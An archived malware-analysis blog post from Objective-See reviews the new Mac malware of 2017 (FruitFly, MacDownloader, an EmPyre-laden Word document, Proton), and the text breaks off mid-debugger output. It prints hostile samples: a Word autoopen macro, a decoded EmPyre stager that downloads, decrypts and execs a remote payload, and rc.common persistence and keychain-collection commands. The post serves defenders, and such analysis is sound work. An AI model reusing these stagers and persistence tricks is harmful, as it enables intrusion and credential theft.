{ "id": "6135a931-c738-4555-8de5-ca250ec09c80", "created_at": "2026-04-06T00:09:44.735785Z", "updated_at": "2026-04-10T03:37:50.666626Z", "deleted_at": null, "sha1_hash": "62e8e695a08a7e3c1db4e245db414809b38dd968", "title": "Mac Malware of 2017", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6331917, "plain_text": "Mac Malware of 2017\r\nArchived: 2026-04-05 21:16:10 UTC\r\nMac Malware of 2017\r\n› a comprehensive analysis of the new mac malware of '17\r\nlove these blog posts? support my tools \u0026 writing on patreon :)\r\nIntroduction\r\nHooray, it's almost the new year! 2018 is going to be incredible, right? ...right?\r\nFor the second year in a row, I've decided to post a blog that comprehensively covers all the new Mac malware that appeared\r\nduring the course of the year. While the specimens may have been briefly reported on before (i.e. by the AV company that\r\ndiscovered them), this blog aims to cumulatively cover all new Mac malware of 2017 - in one place. For each, we'll dive\r\ninto various technical details such as identifying the malware's infection vector, persistence mechanism, features \u0026 goals,\r\nand describe how to clean an infected system.\r\nThis year, I've decided to start 'early' and add one or two malware specimens each day, until the blog post is complete. So\r\ncheck back each day, or follow Objective-See on twitter for updates!\r\nBy the way, if you want to play along, all samples can be downloaded from Objective-See's malware page.\r\nBy downloading the samples, you waive all rights to claim punitive, incidental and consequential damages resulting from\r\nmishandling or self-infection!\r\nAlso, the 'disinfection' instructions provided in this blog are specific to each malware specimen. Often malware can install\r\nother malware, or allow an remote attacker to do what ever they want. Thus if you were/are infected by any of these\r\nsamples, it's suggested you fully re-install macOS.\r\nTimeline\r\nA fully-featured backdoor, designed to perversely spy on Mac users\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 1 of 67\n\nIranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.\r\nThe open-source macOS backdoor, 'Empye', maliciously packaged into a macro'd Word document\r\nA fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files,\r\nbrowser login data, and keychains.\r\nAPT28's second-stage persistent macOS backdoor.\r\nA barely functional piece of macOS ransomware, written in Swift.\r\nA banking trojan that that redirects an infected user's web traffic in order to extract banking credentials.\r\nA port of a highly sophisticated Windows backdoor, currently the Mac version appears incomplete and lacking\r\nfeatures...for now!\r\nStandard macOS backdoor, offered via a 'malware-as-a-service' model.\r\nA basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.\r\nA crypto-currency miner, distributed via a trojaned 'CS-GO' hack.\r\nA macOS crypto-currency mining trojan.\r\nOSX/FruitFly:\r\n FruitFly\r\nfound: January, by MalwareBytes\r\ninfection: unknown\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 2 of 67\n\nFruitFly\nfeatures: perversely spy on users\ndisinfection: remove launch agent\nwriteups:\n\"New Mac backdoor using antiquated code\" (MalwareBytes)\n\"Dissecting OSX/FruitFly.B via a custom C\u0026C server\" (P. Wardle)\nOSX/FruitFly, the first Mac malware discovered in 2017, was designed to stealthily spy on 'everyday' Mac users via their\nwebcams. Due its longevity and perverse goals it was covered extensively in the media (e.g. see: 'Mysterious Mac Malware\nHas Infected Victims for Years').\n infection vector:\nThe infection vector for FruitFly was never uncovered. However due to ongoing research and law-enforcement involvement,\nhopefully the mechanism by which the malware infected Mac users will eventually be revealed. In the meantime, it seems\nplausible that the malware may have infected users via common infection vectors such as email, trojanized applications, or\nmalicious ads/popups (that trick users into downloading \u0026 executing the malware):\n persistence:\nWhat is known, is that FruitFly persists a launch agent. Specifically it creates a property list (plist) file in\n~/Library/LaunchAgents/ directory. For variant 'A', this file is named com.client.client.plist:\n$ cat ~/Library/LaunchAgents/com.client.client.plist\n?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\nKeepAliveLabelcom.client.clientProgramArguments/Users/user/.client https://objective-see.com/blog/blog_0x25.html\nPage 3 of 67\n\nRunAtLoadNSUIElement1 As the plist sets the RunAtLoad key set to true, macOS will automatically execute whatever is specified in the\nProgramArguments key whenever the user log in. In the case of FruitFly this is backdoor's main component:\n/Users/user/.client. (Note: for variant 'B', the file is named 'fpsaud').\nBy using a tool such as KnockKnock, which displays persistently installed software, it's trivial to reveal FruitFly's persistent\ncomponent (here; OSX/FruitFly.B's 'fpsaud'):\n features:\nThe main component of OSX/FruitFly is an obfuscated perl script:\n$ cat fpsaud\n#!/usr/bin/perl use strict;use warnings;use IO::Socket;use IPC::Open2;my$l;sub G{die if!defined syswrite$l,$_[0]}sub\nJ{my($U,$A)=('','');while($_[0]\u003elength$U){die if!sysread$l,$A,$_[0]-length$U;$U.=$A;}return$U;}sub O{unpack'V',J\n4}sub N{J O}sub H{my$U=N;$U=~s/\\\\/\\//g;$U}sub\nI{my$U=eval{my$C=`$_[0]`;chomp$C;$C};$U=''if!defined$U;$U;}sub K{$_[0]?v1:v0}sub Y{pack'V',$_[0]}sub\nB{pack'V2',$_[0]/2**32,$_[0]%2**32}sub Z{pack'V/a*',$_[0]}sub M{$_[0]^(v3 x\nlength($_[0]))}my($h,@r)=split/a/,M('11b36-301-;;2-45bdql-lwslk-hgjfbdql...\nReverse-engineering this script (which also contains an embedded mach-O binary), would have been a rather time\nconsuming process. Thus I decided to simply create a custom command \u0026 control server in order to coerce the malware to\nreveal it's capabilities simply by tasking! If you want to learn more about this, check out the lengthy whitepaper I wrote, or\nhttps://objective-see.com/blog/blog_0x25.html\nPage 4 of 67\n\nwatch my DefCon talk on the topic:\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nBesides standard backdoor features such as remote access to the file system, system commands and the webcam (variant\r\n'A'), using this analysis technique revealed that the malware would generate and exfiltrate screen captures (as PNGs):\r\nVia a custom mouse and keyboard sniffer I wrote (and open-sourced on GitHub) for this analysis, we can also see that\r\nFruitFly affords a remote attacker the ability to generate both simulated mouse and keyboard events. AFAIK, this is first\r\ntime such a capability has been (publicly) seen in Mac malware!\r\n# ./sniffMK\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 5 of 67\n\nevent: kCGEventKeyDown\r\nkeycode: 0/0/a\r\nevent: kCGEventKeyUp\r\nkeycode: 0/0/a\r\nevent: kCGEventKeyDown\r\nkeycode: 0xb/11/b\r\nevent: kCGEventKeyUp\r\nkeycode: 0xb/11/b\r\nevent: kCGEventKeyDown\r\nkeycode: 0x8/8/c\r\nevent: kCGEventKeyUp\r\nkeycode: 0x8/8/c\r\nevent: kCGEventLeftMouseDown\r\n(x: 640.230469, y: 624.195312)\r\nevent: kCGEventLeftMouseUp\r\n(x: 640.230469, y: 624.195312)\r\nThe full list of capabilities of OSX/FruitFly.B -revealed via tasking from the custom command \u0026 control server- are shown\r\nbelow:\r\n disinfection:\r\nKnown variants of OSX/FruitFly can be removed from an infected system, via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n$ launchctl unload ~/Library/LaunchAgents/com.client.client.plist\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 6 of 67\n\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist\r\n3. Remove the malware's persistent perl script \u0026 file. Depending on the variant, this file may be:\r\n~/.client or ~/fpsaud\r\nOSX/MacDownloader (iKitten):\r\n MacDownloader (iKitten)\r\nfound: February, by Claudio Guarnieri/Collin Anderson ('Iran Threats')\r\ninfection: fake Adobe Flash player\r\nfeatures: exfiltration of user data, such as keychain\r\ndisinfection: remove malicious app (persistence code is broken)\r\nwriteups: \"iKittens: Iranian Actor Resurfaces With Malware For Mac\" (Iran Threats)\r\nOSX/MacDownloader is a simple (incomplete?) macOS exfiltration agent, tied to Iranian offensive cyber operations. In their\r\nwriteup, \"iKittens: Iranian Actor Resurfaces With Malware For Mac\", Claudio Guarnieri and Collin Anderson provide a\r\ncomprehensive analysis of the malware.\r\n infection:\r\nAs noted by Claudio and Collin, MacDownloader infections begin with a phishing email. Specifically they state, \"An active\r\nstaging of the MacDownloader agent was first observed linked out from a site impersonating the aerospace firm \"United\r\nTechnologies Corporation,\" a spearphishing site was previously believed to be maintained by Iranian actors for spreading\r\nWindows malware.\" Below is a screen shot of the malicious site (image credit: Claudio/Collin):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 7 of 67\n\nAs can be seen, the site contains a link to what purports to be a required plugin for the video player; Adobe Flash. Of course,\r\nthis links not to a legitimate version of Flash, but \"either Windows or Mac malware based on the detected operating system.\"\r\nIf the user is tricked into running and downloading the 'flash player' application, they'll become infected with\r\nMacDownloader:\r\nIt should be noted though, that the malicious application (addone flashplayer.app) is unsigned. As such, Gatekeeper should\r\nblock the malware from executing - unless the user disables it, or explicitly agrees to allow the unsigned malicious code to\r\nexecute.\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 8 of 67\n\npersistence:\r\nThe security researchers who discovered and analyzed the application note that, \"it appears that the application contains an\r\nunused attempt to install persistent access to the victim host.\" Digging into the code, we can find a method named\r\naddToStartup that will persist the malware by modifying the the /etc/rc.common file, adding a command to execute\r\nsomething named /etc/.checkdev\r\n-[AppDelegate addToStartup:](void * self, void * _cmd, void * arg2) {\r\n   rax = [0x0 lastPathComponent];\r\n   rax = [rax retain];\r\n   var_20 = [NSString stringWithFormat:@\"if cat /etc/rc.common | grep %@; then sleep 1;\r\n            else echo 'sleep %d \u0026\u0026 %@ \u0026' \u003e\u003e /etc/rc.common; fi \", rax, 0x78, 0x0];\r\n   [[[CUtils ExecuteBash:var_20] retain] release];\r\n   ...\r\n}\r\nIn 2014 wrote a paper titled, \"Methods of Malware Persistence on OS X\", where I discussed using /etc/rc.common for\r\npersistence, noting:\r\n\"RC scripts are used in another BSD-flavoured persistence technique that works on OS X, allowing scripts or commands to\r\nautomatically be executed. For example, the rc.common file can be edited to insert arbitrary commands that will\r\nautomatically execute when OS X starts.\"\r\nIt's kind of neat to see a piece of mac malware (ab)using this method for persistence!\r\nGood news though, KnockKnock, which displays persistently installed software, can detect that the rc.common file has been\r\nmaliciously modified:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 9 of 67\n\nfeatures:\r\nThe main goal of OSX/MacDownloader is to survey and collect/exfiltrate sensitive data from an infected target.\r\nClaudio/Collin state:\r\n\"MacDownloader harvests information on the infected system, including the user's active Keychains, which are then\r\nuploaded to the C2. The dropper also documents the running processes, installed applications, and the username and\r\npassword which are acquired through a fake System Preferences dialog.\"\r\nDuring install, the malware displays a fake authentication prompt to collect the user's credentials. Assuming the user is\r\nrunning in the default context of an administrator account, this will give the malware the ability to perform privileged\r\nactions as well as unlock encrypted data in the user's keychain:\r\nDumping the Objective-C class information via jtool, we see methods responsible for the collection:\r\n$ ./jtool -d objc -v \"addone flashplayer.app/Contents/MacOS/Bitdefender Adware Removal Tool\"\r\n@interface AuthenticationController :\r\n// 11 instance methods\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 10 of 67\n\n/* 0 - 0x1000049b0 */ - getLocalIPAddress;\r\n/* 1 - 0x100004fd0 */ - getRunningProcessList;\r\n/* 2 - 0x100005380 */ - getInstalledApplicationsList;\r\n/* 3 - 0x1000059b0 */ - getKeychainsFilePath;\r\n...\r\nTaking a closer look at the 'getRunningProcessList' method reveals the malware simple invokes the [NSWorkspace\r\nsharedWorkspace]'s 'runningApplications' method:\r\n-[AuthenticationController getRunningProcessList](void * self, void * _cmd) {\r\n   var_A0 = [[NSMutableArray alloc] init];\r\n   rax = [NSWorkspace sharedWorkspace];\r\n   var_A8 = [[rax runningApplications] retain];\r\n       rax = [rax countByEnumeratingWithState:var_F0 objects:var_88 count:0x10];\r\n   do {\r\n      ...\r\n      var_F8 = [[NSString stringWithFormat:@\"process name is: %@\\t PID: %d\r\n               Run from: %@\", var_150, var_154, rax] retain];\r\n      [var_A0 addObject:var_F8];\r\nIt should be noted that this method simply returns a list of applications running in the context of the user...not all running\r\nprocesses!\r\nThe malware saves survey information, user credentials, installed apps, and running applications in a file name\r\n/tmp/applist.txt:\r\n$ cat /tmp/applist.txt\r\n\"OS version: Darwin users-Mac.local 16.7.0 Darwin Kernel Version 16.7.0: Thu Jun 15 17:36:27 PDT 2017; root:xnu-3789.70.16~2\\/RELEASE_X86_64 x86_64\",\r\n\"Root Username: \\\"user\\\"\",\r\n\"Root Password: \\\"hunter2\\\"\",\r\n...\r\n[\r\n\"Applications\\/App%20Store.app\\/\",\r\n\"Applications\\/Automator.app\\/\",\r\n\"Applications\\/Calculator.app\\/\",\r\n\"Applications\\/Calendar.app\\/\",\r\n\"Applications\\/Chess.app\\/\",\r\n...\r\n]\r\n\"process name is: Dock\\t PID: 254 Run from: file:\\/\\/\\/System\\/Library\\/CoreServices\\/Dock.app\\/Contents\\/MacOS\\/Dock\",\r\n\"process name is: Spotlight\\t PID: 300 Run from:\r\nfile:\\/\\/\\/System\\/Library\\/CoreServices\\/Spotlight.app\\/Contents\\/MacOS\\/Spotlight\",\r\n\"process name is: Safari\\t PID: 972 Run from: file:\\/\\/\\/Applications\\/Safari.app\\/Contents\\/MacOS\\/Safari\",\r\n...\r\nIn order to grab the keychains of the infected system, the malware zips everything from the /Library/Keychains/ directory\r\ninto the /etc/kcbackup.cfg file:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 11 of 67\n\n$ zip -rj /etc/kcbackup.cfg /Library/Keychains/\r\nadding: apsd.keychain (deflated 58%)\r\nadding: System.keychain (deflated 70%)\r\nThe malware exfiltrates the collected data to a command \u0026 control server, by invoking the\r\n'SendCollectedDataTo:withThisTargetId:' method, which in turn invokes the uploadFile: ToServer: withTargetId: method:\r\n-[AuthenticationController SendCollectedDataTo:withThisTargetId:](void * self, void * _cmd, void * arg2, void * arg3) {\r\n   ...\r\n   if (([CUtils hasInternet:0x0] \u0026 0x1 \u0026 0xff) != 0x0) {\r\n      ...\r\n      var_120 = [@\"/tmp/applist.txt\" retain];\r\n      [CUtils uploadFile:var_120 ToServer:0x0 withTargetId:0x0];\r\n      ...\r\n}\r\n disinfection:\r\n\"Features such as persistence do not appear to work\" ... note the security researchers who analyzed the sample. Thus in\r\ntheory simply killing the malicious app (addone flashplayer.app), or rebooting an infected system should 'remove' the\r\nmalware.\r\n$ ps aux | grep flash\r\nuser 666 /Users/user/Desktop/addone flashplayer.app\r\n$ kill -9 666\r\nHowever, if the malware was able to run it likely already collected and exfiltrated one's credentials and keychains - so, kind\r\nof game over :(\r\nOn the off chance the malware was able to persist, the final line of the rc.common file will contain a command that executes\r\na malicious script: /etc/.checkdev. Delete this command and the .checkdevfile, to remove the persistent infection!\r\nMacro'd Word Document (w/ Empyre):\r\n Macro'd Word Document (w/ Empyre)\r\nfound: Feburary, by Snorre Fagerland@) fstenv)\r\ninfection: Malicous Word document\r\nfeatures: via Empyre; full remote command and control of an infected host\r\ndisinfection: remove: launch item/cronjob/login hoook/etc.\r\nwriteups: \"New Attack, Old Tricks\" (P. Wardle/Objective-See)\r\nThough unnamed by the anti-virus community, this malicious Word documented Mac users in an attempt to surreptitiously\r\ninstall Empyre (an open-source macOS post exploitation agent).\r\n infection:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 12 of 67\n\nOn February 6th, Snorre Fagerland (@fstenv) tweeted the following:\r\n...so we have a malicious word document circulating in the wild, targeting macOS users. Neat!\r\nI grabbed the sample (\"U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm\")\r\nfrom VirusTotal (see here), noting that at the time only four AV engines flagged the Word document as malicious:\r\nOpening the document in Microsoft Word (version 2011, within an isolated macOS VM) triggered an \"this document\r\ncontains macros\" warning:\r\nIf a macOS user opened this document in Microsoft Word, and disregarded this warning...they'd become infected!\r\nAs noted online, recent Word documents are actually \"XML files stored in Zip archives\"...and that \"VBA macros are usually\r\nstored in a binary OLE file within the Zip archive, called vbaProject.bin.\r\nTo extract and analyze the malicious embedded macros, one can use clamAV's sigtool:\r\n$ unzip \"U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm\"\r\n  inflating: [Content_Types].xml\r\n  inflating: _rels/.rels\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 13 of 67\n\ninflating: word/_rels/document.xml.rels\r\n  inflating: word/document.xml\r\n  inflating: word/theme/theme1.xml\r\n  inflating: word/vbaProject.bin\r\n  ...\r\n$ sigtool --vba word/vbaProject.bin\r\n-------------- start of code ------------------\r\nAttribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\n...\r\nSub autoopen()\r\nFisher\r\nEnd Sub\r\n....\r\nPublic Declare Function system Lib \"libc.dylib\" (ByVal command As String) As Long\r\nPublic Sub Fisher()\r\nDim result As Long\r\nDim cmd As String\r\ncmd = \"ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3\"\r\ncmd = cmd + \"NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm\"\r\ncmd = cmd + \"llZF9jb250ZXh0Jyk6c3NsLl9jcmVhdGVfZGVmYXVsdF9odH\"\r\ncmd = cmd + \"Rwc19jb250ZXh0ID0gc3NsLl9jcmVhdGVfdW52ZXJpZmllZF\"\r\ncmd = cmd + \"9jb250ZXh0OwppbXBvcnQgc3lzLCB1cmxsaWIyO2ltcG9ydC\"\r\n....\r\ncmd = cmd + \"BlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl\"\r\ncmd = cmd + \"0pKQpleGVjKCcnLmpvaW4ob3V0KSk=\"\r\nresult = system(\"echo \"\"import sys,base64;exec(base64.b64decode(\\\"\" \" \u0026 cmd \u0026 \" \\\"\"));\"\" | python \u0026\")\r\nEnd Sub\r\nAccording to Microsoft, as its name suggests, the \"AutoOpen macro runs after you open a new document.\" So whenever a\r\nuser opens this document on Mac, in Word, (assuming macros have been/are enabled), the Fisher function will automatically\r\nbe executed.\r\nThe Fisher function decodes a base64 chunk of data (stored in the cmd variable) then executes it via python. Using python's\r\nbase64 module we can easily decode the data:\r\n$ python\r\n\u003e\u003e\u003e import base64\r\n\u003e\u003e\u003e cmd = \"ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBv .... \"\r\n\u003e\u003e\u003e base64.b64decode(cmd)\r\n...\r\ndXFprvsgMBSIyPf = 'atfMzZOqVLbcj'\r\nimport ssl;\r\nif hasattr(ssl, '_create_unverified_context'):\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 14 of 67\n\nssl._create_default_https_context = ssl._create_unverified_context;\r\nimport sys, urllib2;\r\nimport re, subprocess;\r\ncmd = \"ps -ef | grep Little\\ Snitch | grep -v grep\"\r\nps = subprocess.Popen(cmd, shell = True, stdout = subprocess.PIPE)\r\nout = ps.stdout.read()\r\nps.stdout.close()\r\nif re.search(\"Little Snitch\", out):\r\n   sys.exit()\r\no = __import__({\r\n   2: 'urllib2',\r\n   3: 'urllib.request'\r\n}[sys.version_info[0]], fromlist = ['build_opener']).build_opener();\r\nUA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0';\r\no.addheaders = [('User-Agent', UA)];\r\na = o.open('https://www.securitychecking.org:443/index.asp').read();\r\nkey = 'fff96aed07cb7ea65e7f031bd714607d';\r\nS, j, out = range(256), 0, []\r\nfor i in range(256):\r\n   j = (j + S[i] + ord(key[i % len(key)])) % 256\r\n   S[i], S[j] = S[j], S[i]\r\ni = j = 0\r\nfor char in a:\r\n   i = (i + 1) % 256\r\n   j = (j + S[i]) % 256\r\n   S[i], S[j] = S[j], S[i]\r\n   out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))\r\nexec(''.join(out))\r\nThe decoded python contained in the auto-run macro, is pretty simple to read. In short it:\r\n1. checks to make sure LittleSnitch is not running\r\n2. downloads a second-stage payload from https://www.securitychecking.org:443/index.asp\r\n3. RC4 decrypts this payload (key: fff96aed07cb7ea65e7f031bd714607d)\r\n4. executes this now decrypted payload\r\nDoes python code look familiar? Yes! It's taken, almost verbatim from the open-source EmPyre project. Specifically the\r\nlib/common/stagers.py file:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 15 of 67\n\nEmPyre is a \"pure Python post-exploitation agent built on cryptologically-secure communications and a flexible\r\narchitecture.\" Ok, so the attackers are using an open-source multi-stage post-exploitation agent.\r\nAs mentioned above, the goal of the first stage python code is to download and execute a second stage component from\r\nhttps://www.securitychecking.org:443/index.asp. Unfortunately this file is now inaccessible. However, this file was likely\r\njust the second-stage component of Empyre (though yes, the attackers could of course download and executed something\r\nelse).\r\nThis 2nd-stage component of Empyre is the persistent agent, that once installed will complete the infection and affords a\r\nremote attacker continuing access to an infected host.\r\n persistence:\r\nThe malware will only be persisted once the 2nd-stage component has been downloaded and executed from\r\nhttps://www.securitychecking.org:443/index.asp. Assuming this persistent component is indeed Empyre \"stage-two\", how\r\ndoes it persist? Well that's configurable:\r\n(EmPyre) \u003e usemodule persistence\r\nmutli/crontab   osx/CreateHijacker   osx/launchdaemonexecutable   osx/loginhook\r\nSo persistence is likely achieved via a:\r\ncronjob\r\ndylib hijack\r\nlaunch daemon\r\nlogin hook\r\nIf the second-stage component of the malware is persisted as a cronjob orem a launch daemon, BlockBlock will detect the\r\npersistence attempt:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 16 of 67\n\n...I'll likely update BlockBlock to monitor for persistence thru login items, even though this is a very archaic and deprecated\r\npersistence technique. Regardless tools such as KnockKnock or Dylib Hijack Scanner will be able to reveal the persistent\r\ncomponent, regardless of how it is installed :)\r\n features:\r\nThe persistent component of EmPyre can also be configured to run a wide range of EmPyre modules (see:\r\nlib/modules/collection/osx). These modules allow the attacker to perform 'standard' backdoor-type actives such as executing\r\narbitrary commands, file exfiltration, and more. However, it also supports a myriad of more nefarious actions such as:\r\nenabling the webcam\r\ndumping the keychain\r\ninstalling a keylogger\r\naccessing a user's browser history\r\n...and much more\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 17 of 67\n\ndisinfection:\r\nAs the 2nd-stage (persistent) component of this attack was never recovered, we cannot be 100% sure how to clean an\r\ninfected system. However, as noted, it is more than likely that the attackers utilized Empyre's 'stage-two', for persistence,\r\nwhich can only persisted in a finite number of ways.\r\nThus checking these locations (cronjobs, launch items, etc) for a malicious python script should reveal any persistent\r\ninfection associated with this attack. Such checks can be done manually. For example, crontab -l will show installed\r\ncronjobs:\r\n$ crontab -l\r\n@daily ~/Library/Application Support/.malware.py\r\nHowever, it may be easier to use a tool such as KnockKnock which programmatically enumerates items found in such\r\npersistent locations:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 18 of 67\n\nProton:\r\n Proton\r\nfound: Feburary, Sixgill (initial report)\r\ninfection: Trojaned 3rd\r\n-party macOS applications/fake websites\r\nfeatures: backdoor, with focus on collection and exfiltration of keychains, \u0026 passwords.\r\ndisinfection: remove: launch agent\r\nwriteups:\r\n\"Proton - A New Mac OS Rat\" (SixGill)\r\n\"OSX/Proton.B, a brief analysis, at 6 miles up\" (P. Wardle/Objective-See)\r\n\"OSX/Proton[C] spreading again through supply-chain attack\" (Eset)\r\n\"OSX.Proton[D] spreading through fake Symantec blog\" (MalwareBytes)\r\nInitially discovered in February, OSX/Proton keeps popping up throughout 2017. A 'feature complete' macOS backdoor, it\r\nhas a propensity for stealing sensitive information from infected systems. However this malware's most unique feature was\r\nit's effective and perhaps novel (for macOS) infection vector.\r\n infection:\r\nThe first public mention of Proton comes from a Sixgill blog post titled, \"Proton - A New Mac OS Rat\". In this post, the\r\nresearchers detail the 'discovery' of Proton:\r\n\"[we] encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread\r\nannounced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product\r\nin one of the leading underground cybercrime markets.\"\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 19 of 67\n\nThough malware offered for sale ('malware as a service') is fairly common for in the Windows world, it's less common for\r\nmacOS malware. And in terms of infection, this generally means a 2nd party (i.e. the purchaser) is responsible for the vector.\r\nIn 2017, we saw 4 variants of Proton: A-D. While I am unaware of variant A's infection mechanism, the other variant's\r\nmethods of infections are described below.\r\nProton variant 'B' and 'C' both utilized an interesting attack vector in order to infect macOS users. First the attackers gained\r\nunauthorized access to a legitimate 3rd-party application developer's website. Then with such access, they trojaned the\r\nlegitimate application - infecting it with Proton. From that point on, users who downloaded the (now infected) application\r\nfrom the legitimate developer's website would become infected once the application was executed. This rather insidious\r\nattack (often referred to as a \"supply-chain attack\"), can successfully infect even security-conscious macOS users!\r\nIn order to propagate Proton variant 'B', a mirror server of the popular open-source video transcoder, HandBrake, was\r\nhacked. Once the Handbrake developer's detected (or where alerted about) the infection, the following 'security alert' was\r\nadded to the site:\r\nSECURITY WARNING\r\nAnyone who has downloaded HandBrake on Mac between [02/May/2017 14:30 UTC] and [06/May/2017 11:00 UTC] needs\r\nto verify the SHA1 / 256 sum of the file before running it.\r\nAnyone who has installed HandBrake for Mac needs to verify their system is not infected with a Trojan. You have 50/50\r\nchance if you've downloaded HandBrake during this period.\r\nVariant 'C' of Proton propagated in a similar way. Specifically the attacker gained unauthorized access to 'Eltima' and\r\ntrojanizing several applications. It should be noted that for this variant, the attacker's signed the trojanized applications with\r\na 'valid' Apple developer ID, meaning macOS malware mitigations such as Gatekeeper would be 'bypassed' (well, more\r\nspecifically, avoided). Luckily (now) the certificate is now revoked:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 20 of 67\n\nThe final variant of Proton seen in 2017, variant 'D' targeted Mac users in a less elegant way. As discovered by\r\n@noarfromspace, for this variant the attackers created a fake website that attempted to masquerade as a Symantec blog:\r\nMore details on this can be found in MalwareByte's blog post titled, \"OSX.Proton spreading through fake Symantec blog\":\r\n\"The fake site contains a blog post about a supposed new version of CoinThief, a piece of malware from 2014. The fake post\r\npromotes a program called 'Symantec Malware Detector' supposedly to detect and remove the malware. Users who\r\ndownload and run the 'Symantec Malware Detector' will instead be infected with malware [OSX/Proton.D]\"\r\n persistence:\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 21 of 67\n\nProton persists itself as a Launch Agent. Thought (AFAIK) all variants persist in a similar manner, let's take a closer look at\r\nvariant B.\r\nFiring up my open-source macOS process monitor (on github: ProcInfo) and executing the infected Handbrake application,\r\nresults in the following 'process' events:\r\n[new process]\r\npid=1368\r\nbinary=/Volumes/HandBrake/HandBrake.app/Contents/MacOS/HandBrake\r\nsignatureStatus = \"-67062 (unsigned)\r\n[new process]\r\npid=1371\r\nbinary=/usr/bin/unzip\r\nargs: \"-P\", \"qzyuzacCELFEYiJ52mhjEC7HYl4eUPAR1EEf63oQ5iTkuNIhzRk2JUKF4IXTRdiQ\",\r\n\"/Volumes/HandBrake/HandBrake.app/Contents/Resources/HBPlayerHUDMainController.nib\", \"-d\", \"/tmp\"\r\n[new process]\r\npid=1372\r\nbinary=/usr/bin/open\r\nargs: \"/tmp/HandBrake.app\"\r\nFrom this ProcInfo output, we can see that the infected Handbrake application:\r\n1. unzips Contents/Resources/HBPlayerHUDMainController.nib to /tmp/HandBrake.app. This 'nib' is a password\r\nprotected zip file who's password is:\r\nqzyuzacCELFEYiJ52mhjEC7HYl4eUPAR1EEf63oQ5iTkuNIhzRk2JUKF4IXTRdiQ\r\n2. launches (opens) /tmp/HandBrake.app\r\nOnce the /tmp/HandBrake.app is launched, it displays a (fake) authentication popup - which is how the malware attempts to\r\nelevate its privileges:\r\nIf the user is tricked into providing a user name and password the malware will install itself (/tmp/HandBrake.app)\r\npersistently as: 'activity_agent.app'.\r\nIt does this by creating a Launch Agent plist file (fr.handbrake.activity_agent.plist). Dumping this file, we can see the\r\nmalware has set the RunAtLoad key to true, which will ensure that it is automatically started each time the user logs in:\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003c!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\nhttps://objective-see.com/blog/blog_0x25.html\r\nPage 22 of 67\n\nKeepAlive ... ProgramArguments/Users/user/Library/RenderFiles/activity_agent.app/\n Contents/MacOS/activity_agentRunAtLoad As noted, other variants persist in similar manner, although the name of the Launch Agent plist is different. For example,\nwhen executing variant 'C' BlockBlock detects a persistence attempt, noting that the malware is attempting to persist via\n/Library/LaunchAgents/com.Eltima.UpdaterAgent.plist:\nVariant 'D' persists via a plist file named com.apple.xpcd.plist also within the /Library/LaunchAgents/ directory.\n features:\nThe original SixGill blog post contains a screencapture of the advertised features of Proton:\nhttps://objective-see.com/blog/blog_0x25.html\nPage 23 of 67\n\nWe can gain more insight into the malware's features by reversing its core binary. Specifically, we determine that the\r\nmalware (here, variant 'B') will somewhat 'stealthily' build a path to an encrypted file named '.hash' in its resources directory\r\n(/tmp/HandBrake.app/Contents/Resources/.hash):\r\n//path: /tmp/HandBrake.app/Contents/Resources/.hash\r\nrbx = [NSString stringWithFormat:@\"%@/%@%@%@%@%@\", r13, @\".\", r9, @\"a\", @\"s\", @\"h\"];\r\nThis file is loaded into memory by the malware and then decrypted via a call to [RNDecryptor\r\ndecryptData:withPassword:error:]. The decryption password is\r\n'9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57e':\r\nProcess 486 stopped\r\n* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over\r\nHandBrake`___lldb_unnamed_symbol521$$HandBrake:\r\n-\u003e 0x100017583 \u003c+259\u003e: callq *%r15\r\n0x100017586 \u003c+262\u003e: movq 